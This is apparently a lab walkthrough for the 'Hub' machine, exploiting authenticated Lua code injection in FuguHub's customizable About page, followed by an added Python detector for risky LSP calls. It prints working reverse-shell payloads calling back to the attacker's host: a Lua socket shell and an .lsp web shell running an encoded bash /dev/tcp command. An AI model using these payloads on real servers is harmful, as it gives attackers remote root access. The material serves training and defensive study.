# Hub

`lua` `Barracuda` `WebDav`

* Machine name: Hub
* Difficulty: Easy
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 12:49 EDT
Nmap scan report for 192.168.233.25
Host is up (0.035s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp   open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
8082/tcp open  http     Barracuda Embedded Web Server
|_http-server-header: BarracudaServer.com (Posix)
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   Server Date: Sun, 18 Aug 2024 16:50:07 GMT
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  WebDAV type: Unknown
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-title: Home
9999/tcp open  ssl/http Barracuda Embedded Web Server
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Not valid before: 2019-07-16T19:15:09
|_Not valid after:  2074-04-18T19:15:09
|_http-server-header: BarracudaServer.com (Posix)
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   Server Date: Sun, 18 Aug 2024 16:50:07 GMT
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  WebDAV type: Unknown
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.233.25/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.233.25/__24-08-18_12-50-54.txt

Target: http://192.168.233.25/

[12:50:54] Starting: 
[12:51:08] 301 -  169B  - /applications  ->  http://192.168.233.25/applications/
[12:51:11] 301 -  169B  - /data  ->  http://192.168.233.25/data/
[12:51:16] 200 -   87B  - /LICENSE.txt
[12:51:22] 200 -   18KB - /readme.txt
[12:51:26] 301 -  169B  - /themes  ->  http://192.168.233.25/themes/

Task Completed
```

### HTTP (9999) : Barracuda Embedded Web Server

We first create an account, then log in.

```
┌──(kali㉿kali)-[~/oscp]
└─$ cadaver https://192.168.233.25:9999/fs/
WARNING: Untrusted server certificate presented for `FuguHub':
Certificate was issued to hostname `FuguHub' rather than `192.168.233.25'
This connection could have been intercepted.
Issued to: California, US
Issued by: SharkSSL, Real Time Logic LLC, US
Certificate is valid from Tue, 16 Jul 2019 19:15:09 GMT to Wed, 18 Apr 2074 19:15:09 GMT
Do you wish to accept the certificate? (y/n) y
Authentication required for Web File Server on server `192.168.233.25':
Username: admin
Password: 
dav:/fs/> ls
Listing collection `/fs/': succeeded.
Coll:   .LOCK                                  0  Jun 13  2023
Coll:   images                                 0  Jul 16  2019
Coll:   introduction-to-photo-albums           0  Apr 30  2014
        autumn.txt                           153  Nov  3  2021
        favicon.ico                          600  Nov  3  2021
        flower.txt                            95  Nov  3  2021
        passion.txt                           76  Nov  3  2021
        red.txt                               42  Nov  3  2021
        rounded.txt                          188  Nov  3  2021
        sky.txt                              112  Nov  3  2021
        zenlike.txt                           91  Nov  3  2021
dav:/fs/> 
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FWeIgR5HqsGoscuT8CO8a%2F397d9f33c7e556efcf8f66b99ba81144.png?alt=media&#x26;token=6dff19a3-ad6b-4db1-9c02-6009b4834694" alt=""><figcaption></figcaption></figure>

We go to Administrator Panel, then Customize About Page. The about page is written in Lua.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FqV52Xgms5InjYLYJA3AE%2F1206dda0adc2d076958f5a5ab994ff19.png?alt=media&#x26;token=57ddfcfd-cb04-4f6e-97da-033f1bda6873" alt=""><figcaption></figcaption></figure>

## Initial access

There is a field that lets us customize the page, so we try to exploit it by injecting Lua code.

{% embed url="<https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697>" %}

```
<style>
#info {background: #2F94FA;border-radius: 10px;margin:10px;padding:10px}
#info p {margin-left:10px;font-size:120%}
#info p,#info a,#info a:hover{color:white;}
</style>

<?lsp if request:method() == "GET" then ?>
    <?lsp 
        local host, port = "192.168.45.176", 8082
        local socket = require("socket")
        local tcp = socket.tcp()
        local io = require("io")
        local connection, err = tcp:connect(host, port)
        
        if not connection then
            print("Error connecting: " .. err)
            return
        end
        
        while true do
            local cmd, status, partial = tcp:receive()
            if status == "closed" or status == "timeout" then break end
            if cmd then
                local f = io.popen(cmd, "r")
                local s = f:read("*a")
                f:close()
                tcp:send(s)
            end
        end
        
        tcp:close()
    ?>
<?lsp else ?>
    Wrong request method, goodBye! 
<?lsp end ?>

<h2>FuguHub <?lsp=bd.version?></h2>
<img style="margin:30px" src="/rtl/images/logo.gif" alt="logo" align="left" />

<div style="margin-left:auto;margin-right: auto;width: 350px;"> 

<div id="info">
<h2>License</h2>
<p>FuguHub is free to use for non-commercial or educational use. FuguHub cannot be used for commercial use.</p>
</div>

<p>FuguHub is powered by: 
<ul>
<li><a href="https://realtimelogic.com/products/barracuda-application-server/" target="_blank">Barracuda Embedded Web Server</a></li>
<li><a href="https://realtimelogic.com/products/sharkssl/" target="_blank">SharkSSL Embedded SSL Stack</a></li>
<li><a href="https://realtimelogic.com/products/lua-server-pages/" target="_blank">Lua Server Pages</a></li>
</ul>
</p>

</div>
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8082
listening on [any] 8082 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.233.25] 37168
whoami
root
```

We are root!

### Second method

This again relies on the fact that the page executes Lua.

We create this file on our machine:

```
┌──(kali㉿kali)-[~]
└─$ cat shell.lsp
<?lsp if request:method() == "GET" then ?>
   <?lsp os.execute("echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNzYvMTIzNCAwPiYxCg== | base64 -d | bash") ?>
<?lsp else ?>
   You sent a <?lsp=request:method()?> request
<?lsp end ?>
```

We upload it to the server, either with cadaver or through the website.

Our file is available at `https://192.168.233.25:9999/shell.lsp`. If we go through the /fs path, the file is downloaded rather than executed.
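A defender-side check covering both methods above, as an added example that is not part of the original writeup or of FuguHub: it scans LSP source (the customized about page, or `.lsp` files found in the web root) for `<?lsp ... ?>` tags that call `io.popen`, `os.execute` or load the `socket` module. The pattern list, the function name `scan_lsp` and the two sample pages are assumptions constructed for illustration.

```python
import re
import sys

# Every <?lsp ... ?> tag is scanned, including <?lsp=expr?> output tags,
# because an expression can call a function just like a code block can.
LSP_TAG = re.compile(r"<\?lsp(.*?)\?>", re.DOTALL)

# Lua calls that reach the OS or the network (assumed list, limited to
# the calls used by the two payloads shown on this page).
RISKY = {
    "io.popen": re.compile(r"\bio\s*\.\s*popen\b"),
    "os.execute": re.compile(r"\bos\s*\.\s*execute\b"),
    "require socket": re.compile(r"""\brequire\s*\(?\s*["']socket["']"""),
}

def scan_lsp(text):
    """Return sorted (line_number, finding) pairs for risky calls inside LSP tags."""
    findings = set()
    for tag in LSP_TAG.finditer(text):
        body, base = tag.group(1), tag.start(1)
        for name, rx in RISKY.items():
            for hit in rx.finditer(body):
                line = text.count("\n", 0, base + hit.start()) + 1
                findings.add((line, name))
    return sorted(findings)

# Constructed sample: a stock-looking about page. The function names appear
# only as plain HTML text, outside any LSP tag, so nothing is reported.
BENIGN = """<h2>FuguHub <?lsp=bd.version?></h2>
<p>Docs mention io.popen and os.execute as plain text.</p>
"""

# Constructed sample: a page whose LSP blocks reach the OS and the network.
SUSPECT = """<?lsp if request:method() == "GET" then ?>
<?lsp
  local socket = require("socket")
  local f = io.popen("uptime", "r")
?>
<?lsp end ?>
<?lsp os.execute("date") ?>
"""

if __name__ == "__main__":
    # Scan files given on the command line, or the constructed samples.
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line, name in scan_lsp(fh.read()):
                print(f"{path}:{line}: {name}")
    if len(sys.argv) == 1:
        print("benign:", scan_lsp(BENIGN))
        print("suspect:", scan_lsp(SUSPECT))
```

A hit is a prompt for review, not proof of compromise: legitimate LSP applications may use these calls, so compare findings against the files shipped with the installation.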
